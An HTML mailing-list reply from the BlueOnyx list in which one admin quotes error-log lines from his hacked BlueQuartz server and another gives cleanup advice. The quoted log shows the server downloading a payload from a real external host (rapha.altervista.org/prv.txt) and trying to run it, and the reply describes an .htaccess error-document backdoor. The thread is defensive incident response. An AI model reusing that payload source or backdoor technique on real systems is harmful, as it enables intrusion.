<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="Content-Type">
</head>
<body bgcolor="#FFFFFF" text="#000000">
Hi Steffan.<br>
<br>
On 13/10/2011 11:07 PM, Steffan wrote:
<blockquote cite="mid:035501cc89a0$adf159f0$09d40dd0$@nl"
type="cite">
<meta http-equiv="Content-Type" content="text/html;
charset=ISO-8859-1">
<meta name="Generator" content="Microsoft Word 12 (filtered
medium)">
<style><!--
/* Font Definitions */
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0cm;
margin-bottom:.0001pt;
font-size:11.0pt;
font-family:"Calibri","sans-serif";}
a:link, span.MsoHyperlink
{mso-style-priority:99;
color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-priority:99;
color:purple;
text-decoration:underline;}
span.E-mailStijl17
{mso-style-type:personal-compose;
font-family:"Calibri","sans-serif";
color:windowtext;}
.MsoChpDefault
{mso-style-type:export-only;}
@page WordSection1
{size:612.0pt 792.0pt;
margin:70.85pt 70.85pt 70.85pt 70.85pt;}
div.WordSection1
{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]-->
<div class="WordSection1">
<p class="MsoNormal"><span lang="EN-US">I still have a client
with a BlueQuartz server (vps)<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"><o:p> </o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">This morning the virtual
server was hacked<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">I looked in the logs and
found this in /var/log/httpd/error_log<o:p> <br>
</o:p></span></p>
</div>
</blockquote>
<br>
I've seen almost identical attacks recently. I saw someone using an
old PHP application (an old copy of creloaded) which contained
security vulnerabilities. This happened on a BlueOnyx server - and
due to the openbasedir restrictions, the damage was restricted to
one vsite. (Thankyou Michael for openbasedir integration - its one
of the most powerful additions in blueonyx)<br>
<br>
The bad guys installed a web based tool that allows remote users to
browse the file system, get files etc etc. and to upload and
manipulate other files. Their next action was to install a web based
spam injection tool, which received spam commands via xml. Check
your postmaster inbox for a higher than normal number of
undeliverable messages - This will be a good indication if they've
done this to you.<br>
<br>
My suggestion to you for troubleshooting: Look at your access logs.
Most HTTP injections are controlled by POST requests in your web
log. <br>
<br>
grep POST /var/log/httpd/access_log | cut -d " " -f 1,8 | cut -d "?"
-f 1| sort | uniq -c | sort -nr | less<br>
<br>
This command will produce a sorted list of URL's where POST commands
are used on your server sorted by frequency of use. Look for items
that are unfamiliar to you - particularly those that are getting a
lot of hits.<br>
<br>
Another hint one specific to your situation<br>
<br>
ls -l `locate .htaccess`<br>
<br>
Look at the dates of the .htaccess files - One or more of them will
have a recent date stamp ... View the file, and you will find where
the error documents are pointing to an external URL. Some older
versions of apache pull this error document externally, and execute
the php code on your system. (Not sure if this is still a problem on
Bluequartz - but it was ages ago). The bad guys use this so that if
you cleanup the initial problem, they still have a backdoor back
into your system. The bot in this case appears to connect back to an
IRC server for remote control.<br>
<br>
Best of luck cleaning up your server.<br>
<br>
Greg.<br>
<br>
<blockquote cite="mid:035501cc89a0$adf159f0$09d40dd0$@nl"
type="cite">
<div class="WordSection1">
<p class="MsoNormal"><span lang="EN-US"><o:p> </o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"><o:p> </o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">[Wed Oct 12 00:07:13
2011] [error] [client 220.181.125.72] no acceptable variant:
/usr/sausalito/ui/web/error/fileNotFound.html<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">--00:07:40--
<a class="moz-txt-link-freetext" href="http://rapha.altervista.org/prv.txt">http://rapha.altervista.org/prv.txt</a><o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"> =>
`prv.txt'<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">Resolving
rapha.altervista.org... 46.4.65.68<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">Connecting to
rapha.altervista.org|46.4.65.68|:80... connected.<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">HTTP request sent,
awaiting response... </span>200 OK<o:p></o:p></p>
<p class="MsoNormal"><span lang="EN-US">Length: 28,039 (27K)
[text/plain]<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"><o:p> </o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"> 0K ..........
.......... ....... 100% 1015.53 KB/s<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"><o:p> </o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">00:07:40 (1015.53 KB/s)
- `prv.txt' saved [28039/28039]<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"><o:p> </o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">sh: line 1: lwp-downlod:
command not found<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">sh: line 1: fetch:
command not found<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">sh: line 2:
rapha.altervista.org/prv.txt: No such file or directory<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"> % Total % Received
% Xferd Average Speed Time Time Time Current<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">
Dload Upload Total
Spent Left Speed<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">^M 14 28039 14
4097 0 0 98324 0 --:--:-- --:--:-- --:--:--
98324^M100 28039 100 28039 0 0 403k 0
--:--:-- --:--:-- --:--:-- 899k<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">sh: line 3: prv.txt:
command not found<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">--00:07:40--
<a class="moz-txt-link-freetext" href="http://rapha.altervista.org/prv.txt">http://rapha.altervista.org/prv.txt</a><o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"> =>
`prv.txt'<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">Resolving
rapha.altervista.org... 46.4.65.68<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">Connecting to
rapha.altervista.org|46.4.65.68|:80... connected.<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">HTTP request sent,
awaiting response... 200 OK<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">Length: 28,039 (27K)
[text/plain]<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"><o:p> </o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"> </span>0K
.......... .......... ....... 100%
1020.34 KB/s<o:p></o:p></p>
<p class="MsoNormal"><o:p> </o:p></p>
<p class="MsoNormal"><span lang="EN-US">00:07:40 (1020.34 KB/s)
- `prv.txt' saved [28039/28039]<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"><o:p> </o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">sh: line 1: lwp-downlod:
command not found<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">sh: line 1: fetch:
command not found<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">sh: line 2:
rapha.altervista.org/prv.txt: No such file or directory<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"> % Total % Received
% Xferd Average Speed Time Time Time Current<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">
Dload Upload Total Spent Left Speed<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">^M 4 28039 4
1201 0 0 42493 0 --:--:-- --:--:-- --:--:--
42493^M100 28039 100 28039 0 0 507k 0
--:--:-- --:--:-- --:--:-- 1048k<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">sh: line 3: prv.txt:
command not found<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"><o:p> </o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">I don’t see any admin
logins<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">How can I find out what
happened<br>
I dont see anything weird in the access log or message log<o:p></o:p></span></p>
<p class="MsoNormal"><span lang="EN-US"><o:p> </o:p></span></p>
<p class="MsoNormal"><span lang="EN-US">Thanxs Steffan<o:p></o:p></span></p>
</div>
<br>
<fieldset class="mimeAttachmentHeader"></fieldset>
<br>
<pre wrap="">_______________________________________________
Blueonyx mailing list
<a class="moz-txt-link-abbreviated" href="mailto:Blueonyx@mail.blueonyx.it">Blueonyx@mail.blueonyx.it</a>
<a class="moz-txt-link-freetext" href="http://mail.blueonyx.it/mailman/listinfo/blueonyx">http://mail.blueonyx.it/mailman/listinfo/blueonyx</a>
</pre>
</blockquote>
<br>
<br>
<pre class="moz-signature" cols="72">--
+---------------------------------------------------------------------+
| / \ Greg Kuhnert,<a class="moz-txt-link-abbreviated" href="mailto:gkuhnert@compassnetworks.com.au">gkuhnert@compassnetworks.com.au</a> |
| < o > Compass Networks - Pointing you in the right direction |
| \ / See us for BlueQuartz / BlueOnyx modules and Support. |
+---------------------------------------------------------------------+</pre>
</body>
</html>